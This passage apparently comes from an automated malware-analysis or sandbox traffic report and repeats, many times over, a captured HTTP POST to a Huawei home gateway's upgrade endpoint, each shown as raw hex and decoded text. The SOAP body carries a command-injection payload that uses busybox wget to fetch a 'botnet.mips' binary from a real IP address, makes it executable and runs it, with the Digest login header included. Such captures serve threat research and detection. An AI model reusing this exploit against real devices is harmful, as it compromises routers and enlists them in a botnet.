s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * 